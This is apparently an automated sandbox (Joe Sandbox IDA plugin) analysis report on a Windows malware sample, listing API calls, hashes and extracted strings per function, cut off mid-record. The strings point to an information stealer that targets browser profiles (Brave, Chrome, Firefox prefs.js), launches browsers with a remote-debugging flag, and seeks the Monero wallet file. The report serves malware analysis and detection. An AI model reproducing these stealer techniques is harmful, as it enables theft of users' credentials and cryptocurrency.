                                      • Opcode ID: e308381b551218a60767898aa9b6f9e3fdbaf33d82d74dee706f87166ef7fc0d
                                      • Instruction ID: 251aeed38066030c62a40f759baa3f4b31e2bd7aa604d9b139317667956c5fcc
                                      • Opcode Fuzzy Hash: e308381b551218a60767898aa9b6f9e3fdbaf33d82d74dee706f87166ef7fc0d
                                      • Instruction Fuzzy Hash: 02E012A6A1430153CA1477B47E17F2F329C5B1534AF44041BF90AD2313FD29E8414275
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00AE0B32,00AE0B2F,00000000,?,?,?,00AE1450,00AE0B2E), ref: 00ACBEC5
                                      • StrCmpCA.SHLWAPI(?,00AE1454), ref: 00ACBF33
                                      • StrCmpCA.SHLWAPI(?,00AE1458), ref: 00ACBF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACC8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00ACC8BB
                                      Strings
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC3B2
                                      • \Brave\Preferences, xrefs: 00ACC1C1
                                      • Preferences, xrefs: 00ACC104
                                      • Brave, xrefs: 00ACC0E8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00ACC534
                                      • Google Chrome, xrefs: 00ACC6F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 6701cee47ad1ba9799d0452931eba842b84dfc54712d10c791ba1b6f06a8117e
                                      • Instruction ID: 060b1a54a0eef43906d518680bf612f1b160e7695e72d16b273c5da0383032d9
                                      • Opcode Fuzzy Hash: 6701cee47ad1ba9799d0452931eba842b84dfc54712d10c791ba1b6f06a8117e
                                      • Instruction Fuzzy Hash: 0C5243725101189BCB14FB60DE96FEE733DAF64300F40459AB54BA6291EE30AF49CF66
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD3B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD3B33
                                      • lstrcat.KERNEL32(?,?), ref: 00AD3B85
                                      • StrCmpCA.SHLWAPI(?,00AE0F58), ref: 00AD3B97
                                      • StrCmpCA.SHLWAPI(?,00AE0F5C), ref: 00AD3BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD3EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00AD3ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: 1973f464abc272b756c264912270a97bbe2a70bd6efae83f8ba2e483904abcd1
                                      • Instruction ID: 1bcfdbf936bb4d1e46a8aefb35cb247cb7bb3551634d56c807e9cb3349f1f7a4
                                      • Opcode Fuzzy Hash: 1973f464abc272b756c264912270a97bbe2a70bd6efae83f8ba2e483904abcd1
                                      • Instruction Fuzzy Hash: A4A12072A10318ABDF24DF64DD85FEE7379BB44700F04458AB60E96291EB719B84CF62
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD4B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                      • StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                      • StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 6e23d0ba795361c0240a5610a0603170b78c1aa2e478fad630cffd535ed59d4b
                                      • Instruction ID: de9ec60afa4ef70581d8b0759f27a483a37f0137d55affdb5a2744f016931728
                                      • Opcode Fuzzy Hash: 6e23d0ba795361c0240a5610a0603170b78c1aa2e478fad630cffd535ed59d4b
                                      • Instruction Fuzzy Hash: BA614771910218ABCB24EBA0DD45FEA737CBB58700F00458AF64A96251EB71EB84CFA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AD47D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD47D7
                                      • wsprintfA.USER32 ref: 00AD47F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD480D
                                      • StrCmpCA.SHLWAPI(?,00AE0FAC), ref: 00AD483B
                                      • StrCmpCA.SHLWAPI(?,00AE0FB0), ref: 00AD4851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD48DB
                                      • FindClose.KERNEL32(000000FF), ref: 00AD48F0
                                      • lstrcat.KERNEL32(?,0154FBF0), ref: 00AD4915
                                      • lstrcat.KERNEL32(?,0154E088), ref: 00AD4928
                                      • lstrlen.KERNEL32(?), ref: 00AD4935
                                      • lstrlen.KERNEL32(?), ref: 00AD4946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: bc3c14dfefed30ac9cbd463437cfc11af1b97b28224831099d44cb7a95540a8e
                                      • Instruction ID: 5fb705d4a5d115a205a904d25806383469db0c1af5ea9dca4633480f3d698380
                                      • Opcode Fuzzy Hash: bc3c14dfefed30ac9cbd463437cfc11af1b97b28224831099d44cb7a95540a8e
                                      • Instruction Fuzzy Hash: 2A5144B1914318ABCB24EB70DD99FED737CAB58700F40458AB64AD6250EB74DB84CFA1
                                      APIs
                                      • wsprintfA.USER32 ref: 00AD4113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00AD412A
                                      • StrCmpCA.SHLWAPI(?,00AE0F94), ref: 00AD4158
                                      • StrCmpCA.SHLWAPI(?,00AE0F98), ref: 00AD416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AD42BC
                                      • FindClose.KERNEL32(000000FF), ref: 00AD42D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 00c7f92b2ffcf5440bed5b1fad9d7b7922154d7fb969b3e0258a4979651dcea9
                                      • Instruction ID: 36de98be6485252a667917a1c71a88d9ec73a9546aab5bce5a182147397ed7a5
                                      • Opcode Fuzzy Hash: 00c7f92b2ffcf5440bed5b1fad9d7b7922154d7fb969b3e0258a4979651dcea9
                                      • Instruction Fuzzy Hash: F6517AB1914218ABCB24EBB0DD45FEE737CBB58300F40468AB64A96150DB75AB85CF64
                                      APIs
                                      • wsprintfA.USER32 ref: 00ACEE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00ACEE55
                                      • StrCmpCA.SHLWAPI(?,00AE1630), ref: 00ACEEAB
                                      • StrCmpCA.SHLWAPI(?,00AE1634), ref: 00ACEEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACF3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00ACF3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: df0a59e051fce5fe1e601aae9e99b41bcdaeeb4e2e0d8656d75acfe79c92d6e9
                                      • Instruction ID: 3000780be2b631a022bc695b85294d12112b7f0d4be2e83f4ccd0e7e2a270bc9
                                      • Opcode Fuzzy Hash: df0a59e051fce5fe1e601aae9e99b41bcdaeeb4e2e0d8656d75acfe79c92d6e9
                                      • Instruction Fuzzy Hash: 0EE1D2729111189ADB54FB60CE66EEE733DAF64300F4045DBB54B62292EE306F89CF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: e7230df76ce02f4d431e3cc8dbb542d6e6e383e9d339ca3a16d2c484b8144ce9
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: BEE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE16B0,00AE0D97), ref: 00ACF81E
                                      • StrCmpCA.SHLWAPI(?,00AE16B4), ref: 00ACF86F
                                      • StrCmpCA.SHLWAPI(?,00AE16B8), ref: 00ACF885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00ACFBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00ACFBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 043f7b4a9eb7b5e6df48a1c1bc4600ae5208203f859eae95590f37b2596357ab
                                      • Instruction ID: a0c3f36bd7d3b79fc7a92546c1d2f2752a3c77bea00a073f0a4b1a08213ee74c
                                      • Opcode Fuzzy Hash: 043f7b4a9eb7b5e6df48a1c1bc4600ae5208203f859eae95590f37b2596357ab
                                      • Instruction Fuzzy Hash: 79B12472A101189FCB24FF64DE96FEE7379AF64300F4045AAA44B56291EF309F49CB91
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00AE523C,?,?,?,00AE52E4,?,?,00000000,?,00000000), ref: 00AC1963
                                      • StrCmpCA.SHLWAPI(?,00AE538C), ref: 00AC19B3
                                      • StrCmpCA.SHLWAPI(?,00AE5434), ref: 00AC19C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AC1D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00AC1E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00AC1E60
                                      • FindClose.KERNEL32(000000FF), ref: 00AC1E72
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: f6b7d4044629500119f28f3058d523b5eca03717470a1d36cf880492093371d4
                                      • Instruction ID: efa6810cb661180c203a11484dcd8366b4349df1b06d5d0a551555e4cf64904c
                                      • Opcode Fuzzy Hash: f6b7d4044629500119f28f3058d523b5eca03717470a1d36cf880492093371d4
                                      • Instruction Fuzzy Hash: 6412DF719101189BCB15EBA0DEA6EEE7379AF64300F4045DBB14766291EF306F89CF61
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
